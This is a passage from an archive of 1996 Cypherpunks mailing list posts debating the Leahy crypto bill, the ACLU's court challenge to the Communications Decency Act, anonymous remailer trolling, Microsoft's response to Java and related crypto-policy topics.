the answer to boneheaded decisions like the Bennis one is obvious.

Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 14 Mar 96 22:54:02 PST
To: cypherpunks@toad.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <199603150556.VAA12675@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:26 PM 3/14/96 -0800, Timothy C. May wrote:
>Mr. Frantz, unless you can prove your claims here, forthwith, I must inform
>you that they are in violation of the Truth in Speech Act of 1996. Please
>retract them, now.

Political speech, not commercial speech.  The act doesn't apply or is
unconstitutional.

>Do you see the problem?

Of course.  Why do you think I said (in the 4th paragraph which you didn't
quote) (ZING :-) ):

>In thinking back over the discussion, I would like to eliminate the
>restrictions without making markets less free by adding yet more barriers
>to market entry.  We certainly need more robust reputation agencies than we
>have now.  I just don't know how to encourage their formation.

BTW - I consider non-free markets, produced primarily by oligarchic
combines of large organizations to be a major impediment to removing
government influence from the economic system.  Easing market entry is one
way to reduce the power of these oligarchic combines.  I don't want to just
trade elected government oppression for unelected corporate oppression.  To
put it bluntly, to suppress the 19th century coal mining strikes, the
companies hired the Pinkertons.  I don't see a whole lot of difference
between this kind of private enterprise transaction, and Ruby Ridge.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 20 Mar 96 12:41:39 PST
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: The Leahy Crypto Bill is Rancid Sausage
In-Reply-To: <UlI6h6G00YUvMRsy5h@andrew.cmu.edu>
Message-ID: <199603202036.MAA26254@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Declan B. McCullagh typed:
> 
> Excerpted from a message to fight-censorship. For the full thread, check out:
> 
>        http://fight-censorship.dementia.org/fight-censorship/dl?thread
>        =The+Leahy+Crypto+Bill+is+Rancid+Sausage&after=1795&type=short
> 
> (On one line, of course.)
> 
> -Declan
> 
> 
> ---------- Forwarded message begins here ----------
> 
> From: Stanton McCandlish <mech@eff.org>
> Message-Id: <199603190315.TAA05777@eff.org>
> To: declan+@CMU.EDU (Declan B. McCullagh)
> Date: Mon, 18 Mar 1996 19:15:09 -0800 (PST)
> Cc: fight-censorship+@andrew.cmu.edu, junger@pdj2-ra.F-REMOTE.CWRU.Edu,
>         tcmay@got.net
> 
> 
> [...]
> 
> As our statement on the bill made clear, *EFF does not support the Leahy 
> bill*, nor do we endorse it, like it, find it useful or any other synonym.
> We're happy to see the issues raise again, a la Cantwell, but we 
                                raised

> specifically recommended simple and complete deregulation. As our 
> co-founder John Gilmore points out, the Leahy bill as written 
> pre-supposes Congressional authority to legislate in this are, and 
                                                            area

> Executive authority to regulate under that legislation. These are notions 
> that we, and Phil Karn, are challenging in court with Constitutional 
> tests we are throwing at the ITAR export regs.
> 
> [...]
> 
> 



--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 20 Mar 96 12:54:15 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: Donut: Web Basic Interpreter. (fwd)
Message-ID: <Pine.SUN.3.91.960320125024.28875B-100000@elaine40.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I just received this as the moderator for comp.os.ms-windows.announce. 

Would that be "Donut" as in "big hole"?

-rich

---------- Forwarded message ----------
Date: Wed, 20 Mar 1996 19:56:54 +0000 (GMT)
From: Michael Burford <mj_burford@pnl.gov>
To: comp-os-ms-windows-announce@cs.washington.edu
Newgroups: comp.os.ms-windows.announce
Subject: ANNOUNCE: Donut: Web Basic Interpreter.

-----------------------------------------------------------------------------
Richland, WA.  March 20, 1996.  Battelle Memorial Institute today released
Donut (1.00 Alpha 1), a Visual Basic form Interpreter for the Web.

Donut is a program that allows a Visual Basic form file to be transmitted 
over the internet and viewed on a user's computer as a form.  This form will 
then interact with the user and their web browser to send or request 
information just like a normal Visual Basic program.  Donut does not require
any Visual Basic files or DLLs in order to work.

This will allow creation of web forms that give the author more control over 
exactly what the form will look like, allows interaction between the Donut 
applet and the user's browser, and allows processing of form information on 
the user's computer instead of on the server.  And it allows you to use 
existing expertise with the very popular and common Visual Basic programming 
language to do so.

Currently Donut is available for the Microsoft Windows operating system 
(Windows 3.x, Windows 95 or NT).  It works with any Windows web browser that
supports the standard interprocess (DDE) communication for web browsers.  
It has been tested and works with Netscape Navigator, Microsoft Internet 
Explorer, and several variations of Mosaic.

Donut should be able to run most simple Visual Basic programs with few if
any modifications.  (Unlike VBScript where you must now cut and paste 
the source code into a HTML page.)

Donut is available without charge to end users.
For more information or to obtain Donut and development information:
http://apc.pnl.gov:2080/donut/


Microsoft, Windows and Visual Basic are trademarks of Microsoft
Corporation.  All other trademarks are the property of their respective
owners.
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 20 Mar 96 12:51:26 PST
To: cypherpunks@toad.com
Subject: If you can't take the heat...  (Was Re: Keep the pressure!)
Message-ID: <v02140b00ad761b8c3f61@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 3/20/96, Perry E. Metzger is rumored to have typed:
> anonymous-remailer@shell.portal.com writes:
> > Some people have wondered why I am anonymous and attack me.
> > I am not ashamed of my views.
>
> Well, then you should be.
>
> > I write this thread anonymous as a form of protest.
>
> Why is it a form of protest? If you aren't ashamed, post it under your
> name.

What amuses me most about this series of rantings by whomever, other
than the paranoid and baseless claims made by the anonymous poster,
is the number of people who have been complaining about the author doing
so anonymously through a remailer.  The irony of such a situation is
too rich to pass up.

It seems that cypherpunks can dish it out when other newsgroups and
mailing lists suffer such problems ("well, the remailers do nothing
that telneting to port 25 cannot do..." or "internet identity is such
a fiction anyway, get used to it"  seem to be common responses), but
when the cypherpunks lists is the victim of unpleasant anonymous messages
we fall back to the tired refrain of "if you have nothing to hide why
are you posting anonymously."  How sad.

So, why the hypocrisy here?  If you don't want to be bothered by these
messages there is a simple solution, use a mail agent that can filter
out remailer postings and trash them.  Of course this would also kill
interesting messages from others who use remailers, but that's the price
we pay for having remailers that do not support anonymous identity upon
which reputation can be built.

Oh yeah, I forgot...cypherpunks write code (snicker).  So why not stop
bitching and write a bit of code that provides for useful anonymous
reputations and/or fix the glaringly obvious problems with current
remailers.

jim, who is sorry that he is not the one posting such trolls to the list
just to make the puppets dance...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Wed, 20 Mar 96 13:10:40 PST
To: cypherpunks@toad.com
Subject: Re: A MODEST PROPOSAL
Message-ID: <199603202114.NAA25699@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy SandFort wrote:
> A CYPHERPUNK CALL TO ARMS!!!
> 
> (Did I get the style right?)  C'punks, if you feels as I do, 
> please take a few moments to sign up for the LIST OF SHAME?  
> Let's show Bill, Bruce, Matt and all the others what most 
> Cypherpunks really think about them and Mr/Ms Anonymous.

This effectively gets the right point across, but might turn 
Cypherpunks into a USENET newsgroup mass posting of "me too" 
sentiments.  As I agree with Sandy on every point, I reluctantly 
choose to start....

"Please add me to your list of shame, Mr. Anonymous." 

Brad Shantz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Wed, 20 Mar 96 13:15:54 PST
To: cypherpunks@toad.com
Subject: NT's C2 rating
Message-ID: <199603202119.NAA26183@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I have  been working for some time on a project that involves doing 
proactive file authorization/authentication under Windows NT.  In the 
process, I've been working on an extension to the Kernel layer of the 
operating system because we need to be able to catch read/writes to 
the disk.  (All perfectly legal according to the DDK, just 
ot documented worth a damn.)  All of this is designed to work 
directly with the functionality given to us by the NT-Security layer.

Basically, I'm now questioning the C2 rating of Windows NT.  The 
entire security layer is  modular to the Kernel.  As a modular 
driver, it can be removed, rewritten, and replaced.   

So, what makes it secure?  What gives it the C2 Rating?  How would 
one go about getting a C2 rating?

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 20 Mar 96 13:37:17 PST
To: cypherpunks@toad.com
Subject: CDA court challenge begins tomorrow
Message-ID: <Pine.SUN.3.91.960320133335.26400E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Read on for more information on the details of the court challenge.

I'm very happy to know that Donna Hoffman and Howard Rheingold will be
testifying. They and other ACLU/CIEC witnesses and plaintiffs have been
deposed by the DoJ over the last two weeks in Washington, DC. During the
weeks separating the two sets of hearing dates, we will be deposing
witnesses that the DoJ plans to call. I would expect those witnesses to
dispute, among other things, the effectiveness of filtering software and
other forms of indecency-blocking. 

-Declan



// declan@eff.org // I do not represent the EFF // declan@well.com //



March 20, 1996

_________________________________________________________________
News from the ACLU National Headquarters


                 ACLU V. RENO:  Background Briefing
                                  
              Three-Judge Panel to Hear ACLU Testimony in 
           Landmark Challenge to Internet Censorship Law
                                                                    
PHILADELPHIA, PA--Beginning tomorrow, a three-judge panel in
federal district court in Philadelphia will hear testimony in the
consolidated cases of ACLU et al v. Reno and American Library
Association et al v. Reno, the landmark challenge to censorship
provisions of the Telecommunications Law of 1996. 

Free speech in cyberspace is at stake as the first major legal
challenge to censorship on the Internet gets underway.  The case began
when the ACLU filed a motion for a temporary restraining order against
indecency provisions of the Telecommunications Bill immediately after
it was signed into law by President Clinton on February 8.  The suit
challenges provisions of the law that criminalize making available to
minors "indecent" or "patently offensive" speech.  

Acting on behalf of 20 individuals and organizations that provide
information via the Internet -- including itself -- the ACLU said it
was moving quickly because it feared that the telecommunications
legislation would have an immediate impact on the Internet.  

Following this action, a second legal challenge was filed on
February 26 by a coalition of more than 20 corporate and trade
organizations known as the Citizens Internet Empowerment Coalition
(CIEC).  The CIEC suit, organized by the American Library Association,
America Online and the Center for Democracy and Technology, was
formally consolidated  with ACLU v. Reno.  

The CIEC lawsuit, which addresses essentially the same issues as
the ACLU challenge, further illustrates the broad spectrum  of
individuals and organizations that would be affected by the censorship
provisions, and strengthens the case for a finding that the law is
unconstitutional.  


The Court Case 

According to procedures laid out by the judges, direct testimony
in ACLU v. Reno is to be submitted via affidavit.  During the three
days of testimony allowed, which will take place over March 21 and 22
and April 1, lawyers for the Department of Justice will cross-examine
coalition witnesses, after which lawyers for the ACLU and ALA
coalitions will have an opportunity to redirect, i.e., question their
witnesses in response to the government's cross-examination.

In preparation for the case, lawyers for the Department of Justice
have been deposing all the ACLU and CIEC witnesses it may choose to
cross-examine.  So far, government lawyers have declined to cross-
examine only two witnesses: Christine Soto and Hunter Allen, teenagers
whose affidavits attest to the importance of uncensored access to the
Internet by minors.  

The government is scheduled to present its witnesses for cross-
examination on April 11 and 12, 1996.  A fourth day of testimony has
been scheduled for April 26, to allow the ACLU and ALA coalitions to
present witnesses rebutting the government's testimony.   Following
these six days of trial,  the judges will issue a ruling.  Depending
on the outcome, either side may seek an appeal to the U.S. Supreme
Court.   


The Witnesses

Thursday, March 21:
--Scott  O. Bradner, senior technical consultant, Information Technology
Services, Harvard University (ALA)
--Ann W. Duvall, president, SurfWatch Inc.  (ALA)
--Patricia Nell Warren, author and publisher, WildCat Press (ACLU)

Friday, March 22
--Donna Hoffman, associate professor of management, Owen Graduate School
of Management, Vanderbilt University (ACLU)
--William Stayton, psychologist and Baptist minister (ACLU)
--Robert B. Cronenberger, director, Carnegie Library of Pittsburgh
Professor (ALA)
--Kiyoshi Kuromiya, director, Critical Path AIDS Project (ACLU)

Monday, April 1
--Howard Rheingold, author and cyberspace expert
--Barry Steinhardt, associate director, ACLU 
--Stephen Donaldson, Stop Prisoner Rape

(*Note: schedule is subject to change)


Chronology

February 7
-- At a news conference in Washington, D.C., the ACLU announces plans
to seek a temporary restraining order against indecency provisions of
the Telecommunications Bill immediately after it is signed into law
by President Clinton on February 8.  
--The ACLU announces the launch of its new "Freedom Network" World
Wide Web site, <http://www.aclu.org>, with a home page declaring,
"Keep Cyberspace Free."  Over 200,000 hits are recorded in the first
48 hours of the launch. 

February 8
--The ACLU files its legal challenge in federal district court in
Philadelphia before Judge Ronald L. Buckwalter.  
-- In the first court action over the constitutionality of the
Communications Decency Act , Judge   Buckwalter directs the government
to refrain from prosecuting for so-called indecent or patently
offensive material online until the motion for a TRO is decided.
-- The judge instructs the government to file a reply brief to the
ACLU's request for a TRO within one week.  
--Government lawyers conceded that the abortion speech restrictions
of the CDA are unconstitutional.  

February 15
-- Judge Buckwalter grants a temporary restraining order on the
indecency provisions of  the Communications Decency Act, and denies
the TRO motions on prosecution for "patently offensive material" and
on the "Comstock Law" abortion speech provisions of the CDA.  
--A three-judge panel is convened to hear the case: Chief Judge
Dolores K. Sloviter, Judge Stuart Dalzell, and Judge Ronald L.
Buckwalter.

February 21
--More than 5,000 visitors to the ACLU website use the "instant action"
feature to e-mail or fax Attorney General Janet Reno, urging her not
to prosecute under the new law.   

February 23
 -- ACLU announces that government lawyers have agreed not to initiate
investigations or prosecute Internet "indecency" until three-judge
court rules on the case.
--Hearing dates set for the case; the ACLU will present its evidence
on March 21 and 22, with April 1 reserved.  The government's dates 
are April 11 and 12, 1996.  The total trial is scheduled to last five days. 

February 26
--More than 20 corporate and trade organizations, known as the Citizens
Internet Empowerment Coalition (CIEC),  initiate a second legal
challenge to the Communications Decency Act.  

February 27
--The CIEC suit, organized by the American Library Association, America
Online and the Center for Democracy and Technology, is formally
consolidated  with ACLU v. Reno.  

March 21  
--Trial opens at 9:30 a.m. in the ceremonial courtroom in federal
district court in Philadelphia.  
 
                                 ###

Contact: Emily Whitfield, (212) 944-9800 ext.426

_________________________________________________________________
Media Relations Office 132 W 43rd Street, NYC 10036 (212) 944-9800 ext. 414







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 20 Mar 96 13:39:49 PST
To: cypherpunks@toad.com
Subject: Re: If you can't take the heat... (Was Re: Keep the pressure!)
In-Reply-To: <v02140b00ad761b8c3f61@[199.2.22.124]>
Message-ID: <Pine.SUN.3.91.960320132512.29484A-100000@elaine40.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Jim McCoy wrote:

> What amuses me most about this series of rantings by whomever, other
> than the paranoid and baseless claims made by the anonymous poster,
> is the number of people who have been complaining about the author doing
> so anonymously through a remailer.  The irony of such a situation is
> too rich to pass up.
> 
> It seems that cypherpunks can dish it out when other newsgroups and
> mailing lists suffer such problems ("well, the remailers do nothing
> that telneting to port 25 cannot do..." or "internet identity is such
> a fiction anyway, get used to it"  seem to be common responses), but
> when the cypherpunks lists is the victim of unpleasant anonymous messages
> we fall back to the tired refrain of "if you have nothing to hide why
> are you posting anonymously."  How sad.
> 
> So, why the hypocrisy here?

I don't see this as hypocrisy. Hypocrisy would be trying to track the guy
down, or turning off the remailer, or filtering anonymous rants at
toad.com. I think it's completely legitimate, and healthy, to question
why people go anonymous while supporting their right to do so. Sometimes
anonymity is necessary, sometimes it's just for fun, sometimes its
cowardice, sometimes it's deception. 

Your point about "stop whining and write code for anonymous reputations"
is misplaced.  Such code ALREADY EXISTS. There are lots of nyms out there
with PGP keys. If you're already PGP-encrypting your message to send it
to an anonymous remailer securely, it's really no more trouble to sign it
with the key for Alice D'Anonymous. If you don't feel secure using PGP 
(and "the real Alice" did have some -- some -- valid points), then use a 
magic number or serialize your messages. It worked for the Unabomber.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Wed, 20 Mar 96 12:41:21 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
In-Reply-To: <199603201016.CAA09094@jobe.shell.portal.com>
Message-ID: <31506d203ab7002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:
> 
> We can be fortunate that their number is small. At least the ones
> we know about. Only three more since the last report. But even
> one is too many.

Well, you can add me to the list. Although there are a couple of
problems with the Leahy bill, it still seems to me to be a step 
in the right direction. 

> 
> These people have alot to answer for. Ask them who they work for
> and who signs there checks. Ask them why they lie. Ask them why
> they are afraid of your right to privacy. (of course we know why)
> Show them HOW WE FEEL. Let them serve as examples too others if
> they are too cowardly to serve as beacons for truth.

I'll answer up front. I work for the University of Minnesota. I don't
get a check, I have direct deposit. If you saw how much it is, you'll
*know* that I don't speak for them. I haven't lied for a couple of
minutes now, and certainly not about my support for the Leahy bill.
I'm not afraid of any right to privacy, in fact I insist on it and
support it whenever possible.

I don't know how you feel, and I wish you wouldn't show me, as I am
afraid that you feel squishy and slightly damp. That might cause me
to lose my appetite.

> 
> THE LIST OF SHAME:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> B. Stewart: stewarts@ix.netcom.com
> B. Unicorn: unicorn@schloss.li
> P. Karn: karn@unix.ka9q.ampr.org
> D. McCullagh: declan@well.com
> 
> BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!

Don't forget grapes!

> 
> THE LEAHY BILL IS 100% PART OF THE PLAN TO KILL FREE CRYPTO.
> YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!

I can't remember breakfast, now what was that about RICO and World Government?
Did I take over the world again and forget to clean up after myself? Sorry.


-- 
Kevin L. Prigge         | "You can always spot a well informed man -
University of Minnesota |  his views are the same as yours."  
email: klp@tc.umn.edu   |  - Ilka Chase 
PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Mar 96 13:12:35 PST
To: cypherpunks@toad.com
Subject: IPG and "Free Samples"
Message-ID: <ad75b4b104021004968a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:42 PM 3/20/96, Michael Froomkin wrote:
>correct me if I'm wrong, but don't the federal direct mail marketing laws
>say that any unsolicited merchandise sent to a person becomes their
>property, regardless of any disclaimers to the contrary included in the
>package?

The _physical_ item, e.g., a box of soap or a free copy of "Newsweek," but
presumably not the _intellectual property_, e.g, the contents of
"Newsweek."

(Just because I get free samples of magazines does not mean I now can do
with the contents whatever I wish, such as post them on the Net; copyright
law is presumably involved.)

This may be more analogous to what IDG has done.

Disclaimers: IANAL, I am not defending IDG or their "broken in less than
one day" tub of snake oil, nor am I defending copyright and direct mail
marketing laws. And I might be wrong about the intellectual property issue,
though I doubt it. Copyright laws are such that rights are not waived even
if free samples are given out, and so forth. IDG can hardly claim their
algorithm has trade secret status when they've distributed it to many
people. Which leaves them with only trying to enforce copyright
protections, a la the Church of Scientology. Maybe IDG will now seek to
collect the only bucks they'll ever get by suing various Cypherpunks who
are distributing their so-called system? Helena Kobrin can become their
lawyer.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 20 Mar 96 12:34:45 PST
To: cypherpunks@toad.com
Subject: Re: The Leahy Crypto Bill is Rancid Sausage
In-Reply-To: <199603190315.TAA05777@eff.org>
Message-ID: <UlI6h6G00YUvMRsy5h@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpted from a message to fight-censorship. For the full thread, check out:

       http://fight-censorship.dementia.org/fight-censorship/dl?thread
       =The+Leahy+Crypto+Bill+is+Rancid+Sausage&after=1795&type=short

(On one line, of course.)

-Declan


---------- Forwarded message begins here ----------

From: Stanton McCandlish <mech@eff.org>
Message-Id: <199603190315.TAA05777@eff.org>
To: declan+@CMU.EDU (Declan B. McCullagh)
Date: Mon, 18 Mar 1996 19:15:09 -0800 (PST)
Cc: fight-censorship+@andrew.cmu.edu, junger@pdj2-ra.F-REMOTE.CWRU.Edu,
        tcmay@got.net


[...]

As our statement on the bill made clear, *EFF does not support the Leahy 
bill*, nor do we endorse it, like it, find it useful or any other synonym.
We're happy to see the issues raise again, a la Cantwell, but we 
specifically recommended simple and complete deregulation. As our 
co-founder John Gilmore points out, the Leahy bill as written 
pre-supposes Congressional authority to legislate in this are, and 
Executive authority to regulate under that legislation. These are notions 
that we, and Phil Karn, are challenging in court with Constitutional 
tests we are throwing at the ITAR export regs.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Mar 96 12:36:56 PST
To: abostick@netcom.com (Alan Bostick)
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <OtEUx8m9LshX085yn@netcom.com>
Message-ID: <199603202035.PAA01839@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Bostick writes:
> Declan McCullagh <declan@well.com> wrote:
> 
> > I may have to adjust my position on Leahy's bill. Any legislation that
> > Dorothy Denning attacks so virulently must be worth passing. 
> 
> That could be exactly what They want you to think!

Oh, God. This is really a bit too much, don't you think?

I mean, its obvious that, whatever its flaws, passage of the Leahy
bill would be very bad for the export control droids. Has it occurred
to you that the whole thing might not be a conspiracy and that the
flaws in the bill might just be that -- flaws?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Mar 96 15:51:10 PST
To: Tim Fulbright <100022.3167@compuserve.com>
Subject: Re: Mr Emmett Page, Asst. Sect. Defense, CCCI
In-Reply-To: <960319215351_100022.3167_EHV88-1@CompuServe.COM>
Message-ID: <199603202350.PAA24534@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain





Tim Fulbright <100022.3167@compuserve.com>
>I think you or someone here recently remarked  the U.S.Government has the only
>_real_ capability to wage world  terrorism on the internet, and after I read
>Frank Sowa's  feb. Boardwatch article I'm beginning to wonder.   I suppose
>quoting the article at length will be at least as good as some of the other
>traffic around here... just in case anybody missed it, Sowa reviewed 35 federal
>reports, and quotes Page saying "As a result, we've had no choice but to create
>an offensive capability in cyberspace.  I can't discuss it ... However, you'd
>feel good and feel safe and secure if you knew about it"  (yeah, really)
>Further, Sowa reports the Natl Defense U is forming an elite Information Corps,
>'a F0rce whose scope is to fight the battles of "Information Warfare from the
>Pentagon war room to the home PCs" according to DOD' (p90-92).... And further,
>RAND corp is using an "all out cyberwar simulator at their research center in
>Santa Monica" and... oh well,  the whole article is just crammed with stuff!
>Yikes!   I would sure like to know what people think about it. thanks.

there  seems to be a lot of hyperventilating in the military arena
about "information warfare" lately. I find it rather strange and 
incomprehensible. there are two chief areas that this frenzy seems
to be in response to:

1. propaganda/espionage areas.
2. hacking. (i.e. breaking in, crashing, etc.)

as for (1), I don't know what the fuss is about. what it suggests to
me is that there are branches of government that take "psyops" (psychological
operations) extremely seriously and are very intent on setting up camp
in cyberspace & the internet, and have probably already done so.

it is as if they are deathly terrified of the ability of individuals
to communicate not only with other individuals but other masses through
web pages and email. I find it quite frightening how many people in
our government have the mindset that "free communication can be a very
dangerous thing." personally I think an application for government
should reject anyone that hasn't memorized the entire bill of rights..

but the recent Strassman & Marlow paper on remailers, which addressed (1),
seemed a bit incomprehensible and bordered on unintelligible.
they talked as if remailers are like weapons that can be fired on
an enemy. (huh???)  either they are deep into psyop or spook psychology, or 
they just don't "get it" that remailers are pretty harmless. I 
tend to believe it is a little of both.

(2) is definitely something to take very seriously. if you want to
learn about how/why infiltrating computers is incredibly appealing
to many in the government, check out info on "danny casolaro" and
Inslaw PROMIS software.

the behind-the-scenes theme to a lot of this is that our massive
cold war apparatus is bored and listless now that the Soviet bogeyman
is gone and they are just moving into new territories to continue
to suck up billions of dollars.

but its awfully hard to read the various scrambled entrails that have
been emerging such as the Leahy bill, Strassman & Marlow paper, etc. in
relation to info warfare-- I tend to think some of it is just 
evidence that there are some amazingly addled people in our government.

BTW I like "boardwatch" mag, read it regularly, 
and highly recommend it to anyone as one of the better & more 
quality cyberspace mags. try www.boardwatch.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Mar 96 16:03:17 PST
To: Alan Olsen <alano@teleport.com>
Subject: Re: Microsoft's "answer" to Java
In-Reply-To: <2.2.32.19960319222247.008b833c@mail.teleport.com>
Message-ID: <199603210003.QAA25408@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


AO on MS response to Java:

>As a web developer, I have some problems with this scheme.  Giving Microsoft
>access to virtually every OLE control on the Web does not make me more
>secure.  Sounds like a way to rip off ideas from the rest of the development
>world.  If someone has a control that might compete with a Microsoft
>product, it could be shelved and/or delayed for "further security testing".
>
>Java has a decentralized mechanism for security.  No one group controls what
>is a "certified" control and what is not.  You write the code and compile it
>and that is that. Furthermore, you are not stuck with Microsoft approved
>platforms.  (I wonder if there will ever be a version of Explorer for the Mac.)
>
>I expect the Microsoft plan to garner a bit of resistance from the Web
>development community over this one...

I think this is a very good example of why nobody should bemoan Java.
when it was first introduced I heard a lot of grouching and sniping
at this really outstanding software (that was admittedly overhyped).
but look what we could have gotten as the first potential standard:
the above system.

MS was apparently caught completely off guard with Java. they had not a clue 
about what it was about, why it was important, and scrambled to deal with it.
they have apparently only reluctantly licensed it as a temporary ploy.
the above motions suggest they ultimately want to control this standard.

all the MS responses to Java outside of licensing it appear to me to
be pathetically missing the point. they don't seem to understand why
Java is so important, namely its decentralized security model you 
refer to. you cannot create this by adding a few function calls on
top of an already insecure language like Visual Basic.
it has to be done incredibly carefully from the ground up as it was
done with Java. I don't think people realize how carefully this language
was constructed, it was developed extremely delicately in a way unlike
many other languages. this is a real breakthrough in software that 
theoretically creates a "secure" programming environment, something that 
has been sought for decades and is now being delivered to the desktop due
to some very hard work and visionary effort.

I noticed that Denning, in her Leahy protest letter, 
referred to glowingly of this MS "endorsement" scheme. I have
a very bad suspicion that MS is like a dog that rolls over whenever
the NSA comes to visit them and tell them how to write their software
(apparently this happens routinely).

anyway, I totally agree with you that their centralized scheme is
really horrible, and its inferiority and headaches are likely to
be spotted and yowled about by many developers as you write.

 there is no probably no need to fear MS's schemes at the moment. as long
as they have an inferior standard its not going to gain much attention
or use and Java already has a very intense momentum going. just because
MS does something in some area is not necessarily reason to take them
seriously. they have had situations where they come out with stuff
that never turns into anything and silently evaporates like all 
companies have. (far less than others, but nonetheless)

one thing I just don't really understand about MS is their seeming
drive to conquer every market. it seems that whenever a new software
market emerges they feel they have to invade it and dominate it
like pirates. this has a lot to do with the psychology of Bill Gates.
the idea that "gosh, somebody else has already done that really well,
and it would be awfully tought to beat them, let's not bother with
that" seems to be lost in that environment completely. instead, it
is, "oh no!! they are beating us!! we have to make a better widget
or we'll all die!!" -- a good example of competition taken to 
extremely unhealthy extremes imho. 

I suspect like others that MS'
glory days are receding and in fact all extremely large companies
may undergo major shifts once our economy fully shifts into the
information age.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <peponmc@fe3.rust.net>
Date: Wed, 20 Mar 96 13:22:53 PST
To: cypherpunks@toad.com
Subject: What's wrong with this picture??
Message-ID: <199603202122.QAA19225@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------------
From:              <Deleted to protect the guilty>
To:               anonymous-remailer@shell.portal.com
Copies to:  cypherpunks@toad.com     
---------------------------------------------------------------------------

Look above, note the "To:" Field, hmmmm, the offending l party mailed a responce 
to an anon remailer.

I have noticed a couple people do this latley.

Please people - THINK, you have just proved beond a shadow of a doubt that you 
are crypto illiterate.

The message is not sent back to the origional sender, it is either qued in the 
remailer's In basket, till the remailer administrator cleans it out, or it is 
trashed upon reciept since it does not have the required Request-Remailing-To: 
format.

*sigh*, I will spare the offending parties the well deserved "Come back when 
you get a clue" flame.
Regards,
Michael Peponis
PGP Key Avalible from MIT Key Server




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 20 Mar 96 13:27:41 PST
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: The return of the IPG Unbreakable System (fwd)
Message-ID: <ad75e0fb00021004414c@[132.162.233.188]>
MIME-Version: 1.0
